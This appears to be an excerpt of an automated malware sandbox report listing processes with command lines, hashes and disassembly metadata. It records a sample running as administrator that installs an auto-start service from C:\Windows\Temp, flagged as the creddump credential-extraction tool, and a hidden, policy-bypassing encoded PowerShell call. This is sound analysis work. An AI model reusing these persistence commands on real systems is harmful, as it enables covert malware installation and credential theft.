                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:36
                                                                                      Start time:04:47:17
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:37
                                                                                      Start time:04:47:17
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:sc query myRdpService
                                                                                      Imagebase:0x7ff79b890000
                                                                                      File size:72'192 bytes
                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:38
                                                                                      Start time:04:47:25
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
                                                                                      Imagebase:0x7ff605a10000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:39
                                                                                      Start time:04:47:25
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:40
                                                                                      Start time:04:47:25
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:sc delete "myRdpService"
                                                                                      Imagebase:0x7ff79b890000
                                                                                      File size:72'192 bytes
                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:41
                                                                                      Start time:04:47:25
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
                                                                                      Imagebase:0x7ff79b890000
                                                                                      File size:72'192 bytes
                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:42
                                                                                      Start time:04:47:25
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\net.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:net start "myRdpService"
                                                                                      Imagebase:0x7ff615470000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:43
                                                                                      Start time:04:47:25
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\net1.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\net1 start "myRdpService"
                                                                                      Imagebase:0x7ff756c80000
                                                                                      File size:183'808 bytes
                                                                                      MD5 hash:BA0BCCC6029FBBE6D8B41197F252742F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:44
                                                                                      Start time:04:47:25
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\Temp\myRdpService.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Temp\myRdpService.exe cakoi10
                                                                                      Imagebase:0x7ff6dfe00000
                                                                                      File size:9'427'456 bytes
                                                                                      MD5 hash:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: hacktool_windows_moyix_creddump, Description: creddump is a python tool to extract credentials and secrets from Windows registry hives., Source: 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmp, Author: @mimeframe
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:45
                                                                                      Start time:04:47:38
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
                                                                                      Imagebase:0x7ff7b1750000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:46
                                                                                      Start time:04:47:38
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Executed Functions

                                                                                        Function 00007FFA83BBF1C6 Relevance: 1.7, Strings: 1, Instructions: 469COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: UAWA
                                                                                        • API String ID: 0-1492024814
                                                                                        • Opcode ID: bf37879c5214a664240f6c0227f8c5098c557b7d652ba6731f28835da52d71d8
                                                                                        • Instruction ID: 6eae74658caed3bbdbbfe405fd9329f424191ab8ea415b71575a9cc077698518
                                                                                        • Opcode Fuzzy Hash: bf37879c5214a664240f6c0227f8c5098c557b7d652ba6731f28835da52d71d8
                                                                                        • Instruction Fuzzy Hash: DBF17E70908B8D8FEBA8DF28D8557E937D1FF55310F04826AE88DC7291DE74A945CB82
                                                                                        Function 00007FFA83BBFF72 Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: UAWA
                                                                                        • API String ID: 0-1492024814
                                                                                        • Opcode ID: 12ac86003f1505daf9508f5759a6502201af575961d5eb3445a113838f4fe48c
                                                                                        • Instruction ID: 618c6e514574d02cb4adbf23fa311c7aa673dcd95859fa24e8ff3e77aa86aee4
                                                                                        • Opcode Fuzzy Hash: 12ac86003f1505daf9508f5759a6502201af575961d5eb3445a113838f4fe48c
                                                                                        • Instruction Fuzzy Hash: FAE1A270A08B4E8FEBA8DF28C8557E977D1FF55310F04826EE84DD7291DA74A941CB82
                                                                                        Function 00007FFA83BBB325 Relevance: 1.6, Strings: 1, Instructions: 399COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: UAWA
                                                                                        • API String ID: 0-1492024814
                                                                                        • Opcode ID: 28df395f61085cf895842ae8daf20dfb34dd837d6634bee9ce0761d19af33bbf
                                                                                        • Instruction ID: 814c6ab4bc7d3969e3e21789b3061314d08441cf6fcfb124df978c2d55cc9cfb
                                                                                        • Opcode Fuzzy Hash: 28df395f61085cf895842ae8daf20dfb34dd837d6634bee9ce0761d19af33bbf
                                                                                        • Instruction Fuzzy Hash: 3831C17190CB488FDB15DB58E8997E9BFF0EF66320F0481AED08DD7152DA64680ACB51
                                                                                        Function 00007FFA83BBFB86 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: UAWA
                                                                                        • API String ID: 0-1492024814
                                                                                        • Opcode ID: bb010c5c7011d738219032d84c197920967d5c569e9f59adae95a6063d1d8312
                                                                                        • Instruction ID: b5ba11be6454fb7819915ad66b6f5ffe314a19b93ba59279b80a58ea91609fe8
                                                                                        • Opcode Fuzzy Hash: bb010c5c7011d738219032d84c197920967d5c569e9f59adae95a6063d1d8312
                                                                                        • Instruction Fuzzy Hash: A9B1A270508B4D8FEB68DF28D8557E93BD1FF56350F04826AE88DC7292CE74A945CB82
                                                                                        Function 00007FFA83BC2C6B Relevance: .2, Instructions: 158COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c0dcb61103708276c84828b4f68f82ddf77a2bf40e168cf5a840237763c179ea
                                                                                        • Instruction ID: e6562e428dbe6dedb8f969ae334728a32f5a2de54eda1663c8853c099ea71c11
                                                                                        • Opcode Fuzzy Hash: c0dcb61103708276c84828b4f68f82ddf77a2bf40e168cf5a840237763c179ea
                                                                                        • Instruction Fuzzy Hash: C2412D71A0CB485FDB199B4CDC4A6EA3BE0FF96321F04413BE48993152DA656816CBD2
                                                                                        Function 00007FFA83C827FA Relevance: .1, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3201626938.00007FFA83C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83C80000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83c80000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f472a070685dc3d1eed0a83979224b504d4a83323a1a4cad29cfe3e72dc240fb
                                                                                        • Instruction ID: 5d431409e67deebbb4afb3f6a5f1f231cf443e3aa2b2b849118e9758650ab424
                                                                                        • Opcode Fuzzy Hash: f472a070685dc3d1eed0a83979224b504d4a83323a1a4cad29cfe3e72dc240fb
                                                                                        • Instruction Fuzzy Hash: AB31E263B0CF194FEFE9971CA8152B973D2EF46221B5845BBC40ED3186DE44ED248381
                                                                                        Function 00007FFA83BBB658 Relevance: .1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ed7129b0dd26a3144b67d9643525a41cbfeacbf7e5a48a182202341788284fa5
                                                                                        • Instruction ID: d087b24d3ab71b0f5adc799da9d33f0b12c555ba682f413284707e3f23694c21
                                                                                        • Opcode Fuzzy Hash: ed7129b0dd26a3144b67d9643525a41cbfeacbf7e5a48a182202341788284fa5
                                                                                        • Instruction Fuzzy Hash: 0131E33090CB4C8FEF58DF98D88A7E97BE0EB66320F04416ED04DD3292CA75A815CB52
                                                                                        Function 00007FFA83BC3018 Relevance: .1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c9aebc985cfba7336ba944255e188796c3be67bb5ebfc014a036083b684eaf51
                                                                                        • Instruction ID: 06eb6267c3daee601fbc01b25b6254c14ac4f36dda407535faa0ba9cd4894a41
                                                                                        • Opcode Fuzzy Hash: c9aebc985cfba7336ba944255e188796c3be67bb5ebfc014a036083b684eaf51
                                                                                        • Instruction Fuzzy Hash: 2721077190CB4C4FDB58DBACD84A7E97BE0EB96321F04826FD04DC3152DA749416CB92
                                                                                        Function 00007FFA83BBF684 Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dd56b016656cc1ef8796347afea50767b60287d5a80f1eeb0ed841eead56bdcd
                                                                                        • Instruction ID: 8b0dde059e99eaeffbf25ed514a476491f2443e1edf70ab445d0d18643771f68
                                                                                        • Opcode Fuzzy Hash: dd56b016656cc1ef8796347afea50767b60287d5a80f1eeb0ed841eead56bdcd
                                                                                        • Instruction Fuzzy Hash: C131FCB0918B5E8EFBB49F15CC0ABF93291FF42315F448139D88E96092CEB86945CB51
                                                                                        Function 00007FFA83BC828D Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d4caf949afa3b19b27cecd79786122a356c2e91c4bc64b26fcc8108937886a32
                                                                                        • Instruction ID: 4e78ce9362405ef6cceee56803d48fb4b261863e3970e744d57c7176ed7ed3e8
                                                                                        • Opcode Fuzzy Hash: d4caf949afa3b19b27cecd79786122a356c2e91c4bc64b26fcc8108937886a32
                                                                                        • Instruction Fuzzy Hash: 9D01289485EBC65ED753673898284737FF49E8322970C85EBE4DCD90A3E88C494AC397
                                                                                        Function 00007FFA83C82818 Relevance: .1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3201626938.00007FFA83C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83C80000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83c80000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 358ff78d9810186eade2b1ac62999fb256d674132a0c2eb8f1f6d59937ae29e0
                                                                                        • Instruction ID: d7b309caa6170b3df00f1a9543dc2deae40567b5c77f246d2c05bb0e38529c1a
                                                                                        • Opcode Fuzzy Hash: 358ff78d9810186eade2b1ac62999fb256d674132a0c2eb8f1f6d59937ae29e0
                                                                                        • Instruction Fuzzy Hash: 7601D6A3F1DF1A4BEFE9931D54192B865C1EF86212B9C897BD40EE3186CE88DD254381
                                                                                        Function 00007FFA83BB37B5 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                        • Instruction ID: 363564cdee64badc8a98fa7486b8f1aee0ba41cfbf312a7ac07e47b2177842f0
                                                                                        • Opcode Fuzzy Hash: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                        • Instruction Fuzzy Hash: 7401847010CB0C4FDB44EF0CE051AA6B7E0FB95320F10056DE58AC3251DA22E882CB42
                                                                                        Function 00007FFA83BC2E58 Relevance: .0, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c6456580ec0fcbcb585f96997cdafd1a7b0eced053210d2773330bd9b4252992
                                                                                        • Instruction ID: af8c2052e135441845536e3578d17fde7eb89955984eedb8a0f024b49f86c2b1
                                                                                        • Opcode Fuzzy Hash: c6456580ec0fcbcb585f96997cdafd1a7b0eced053210d2773330bd9b4252992
                                                                                        • Instruction Fuzzy Hash: 03F0E93080868D8FCB069F64D8195D97FA0FF27210B054287E45CCB1A2DB749559CB92
                                                                                        Function 00007FFA84320688 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3222249175.00007FFA84320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA84320000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa84320000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 68a6f141c89718b858f566dc69830af64c024488820fb27ca760e2d82c80d95a
                                                                                        • Instruction ID: 6068a0ab94b67430c69b3c467415ee33bcd5e02475f2869d291c2ba1d9458b6f
                                                                                        • Opcode Fuzzy Hash: 68a6f141c89718b858f566dc69830af64c024488820fb27ca760e2d82c80d95a
                                                                                        • Instruction Fuzzy Hash: 66E02BA1D0CA550FF794571C285627836D1EFA9740F1480FAE80DDB287EC5D1E4502C1
                                                                                        Function 00007FFA83BC588D Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5f662dbe4b2448f42701def6d62c5a74b530d72585888b69915970e619b21e0d
                                                                                        • Instruction ID: 2689e4f5f0734c4a912f8da91b6a7eed945945a20ff8fae28e35f84ee424759b
                                                                                        • Opcode Fuzzy Hash: 5f662dbe4b2448f42701def6d62c5a74b530d72585888b69915970e619b21e0d
                                                                                        • Instruction Fuzzy Hash: 4CC08CB3B0CA284C7B2CA248FC070FC7390FB82135B188037D28ED1402EA1A302785CE

                                                                                        Non-executed Functions

                                                                                        Function 00007FFA83C832CD Relevance: .8, Instructions: 753COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3201626938.00007FFA83C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83C80000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83c80000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ab0f85b40b92f179b0ec543a14838f894284799ede236a0f02fc8ccfe3538b21
                                                                                        • Instruction ID: e6eefe5009ce982fceb2fb4023cdaaa4a7b1181a3fea18ad310543a7de806bf6
                                                                                        • Opcode Fuzzy Hash: ab0f85b40b92f179b0ec543a14838f894284799ede236a0f02fc8ccfe3538b21
                                                                                        • Instruction Fuzzy Hash: 672249A1A0DBC94FEB96972888251713FE1FF5B210B0D41FBD04DDB193D9989D1AC392
                                                                                        Function 00007FFA83BB0545 Relevance: 8.8, Strings: 7, Instructions: 99COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3200091754.00007FFA83BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffa83bb0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (0$8,$H1$P/$p0$-$/
                                                                                        • API String ID: 0-1720265388
                                                                                        • Opcode ID: 93307cd4764b2ffae1965cb3943c0c5bf25fef546296641b2eaa5ddc37ad1742
                                                                                        • Instruction ID: 338012f89087e0c7e4066ab5a8dc614fab2ea40165826a5d46ae7fa0deec7804
                                                                                        • Opcode Fuzzy Hash: 93307cd4764b2ffae1965cb3943c0c5bf25fef546296641b2eaa5ddc37ad1742
                                                                                        • Instruction Fuzzy Hash: 5231A1C694EFC14FE30683A8685A1796E91BFA720071C80BBE08C674DBDD858D95C382

                                                                                        Executed Functions

                                                                                        Function 00007FFA83AAEB89 Relevance: .1, Instructions: 123COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3056999782.00007FFA83AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83AAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ffa83aad000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e89c9d3a045c0c4079c4ecb957ea439f86f015136fb89a4bb7d6cdd17bdd141b
                                                                                        • Instruction ID: 9565cbb6aed27a48a7db57299f2db0fabfc92beb0ac6e3573993a3e000bf6fd1
                                                                                        • Opcode Fuzzy Hash: e89c9d3a045c0c4079c4ecb957ea439f86f015136fb89a4bb7d6cdd17bdd141b
                                                                                        • Instruction Fuzzy Hash: 2B41247140EFC44FE7568B2898459627FF0EF57320B1945EFD08DCB1A3D62AA84AC792
                                                                                        Function 00007FFA83BC3C85 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3058341986.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 93c12740486d5aa1497a5d147b0a8f991b2988125b45b34c49310e957cc04e38
                                                                                        • Instruction ID: 2e8e50126d5fb0a160780354fdf98c4bc76ca72da68e6edede7d213088cbf232
                                                                                        • Opcode Fuzzy Hash: 93c12740486d5aa1497a5d147b0a8f991b2988125b45b34c49310e957cc04e38
                                                                                        • Instruction Fuzzy Hash: 1301447111CB0C4FDB44EF0CE455AA6B7E0FB95324F50456DE58AC3651D626E882CB46
                                                                                        Function 00007FFA83AAEC99 Relevance: .0, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3056999782.00007FFA83AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83AAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ffa83aad000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 62cb6baabc6cab45004998faf39a80988f6ad1b020685515b93ed969e867da19
                                                                                        • Instruction ID: d0dd0a841affe269d3d07ce0885695cb0fa03cad4dc729d916dac5c8507eced5
                                                                                        • Opcode Fuzzy Hash: 62cb6baabc6cab45004998faf39a80988f6ad1b020685515b93ed969e867da19
                                                                                        • Instruction Fuzzy Hash: 1CE01231929E09CFCA94FF2DC489D25B7E1FB58300B145468D04EC7251C675F881CB80

                                                                                        Non-executed Functions

                                                                                        Function 00007FFA83BC0545 Relevance: 8.8, Strings: 7, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3058341986.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (0$8,$H1$P/$p0$-$/
                                                                                        • API String ID: 0-1720265388
                                                                                        • Opcode ID: 5c8cbf9a339319e333201be71d07e35cd76947243af40aafd959b99be18e206e
                                                                                        • Instruction ID: 2a63d4d8b6f825afe2f2578c7880db7e38ce11ab9b6c189cfed4b81c3bb2fd07
                                                                                        • Opcode Fuzzy Hash: 5c8cbf9a339319e333201be71d07e35cd76947243af40aafd959b99be18e206e
                                                                                        • Instruction Fuzzy Hash: E23184D694EFC14FE76A83A8585A1396E91BF6730071C80BBE0CC5B1DBC885DD56C381

                                                                                        Execution Graph

                                                                                        Execution Coverage:1.6%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:3
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 7454 7ffa83bce674 7456 7ffa83bce67d LoadLibraryExW 7454->7456 7457 7ffa83bce72d 7456->7457

                                                                                        Executed Functions

                                                                                        Function 00007FFA83BCE674 Relevance: 1.6, APIs: 1, Instructions: 117libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 192 7ffa83bce674-7ffa83bce67b 193 7ffa83bce686-7ffa83bce6ef 192->193 194 7ffa83bce67d-7ffa83bce685 192->194 197 7ffa83bce6f9-7ffa83bce72b LoadLibraryExW 193->197 198 7ffa83bce6f1-7ffa83bce6f6 193->198 194->193 199 7ffa83bce733-7ffa83bce75a 197->199 200 7ffa83bce72d 197->200 198->197 200->199
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3898891623.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
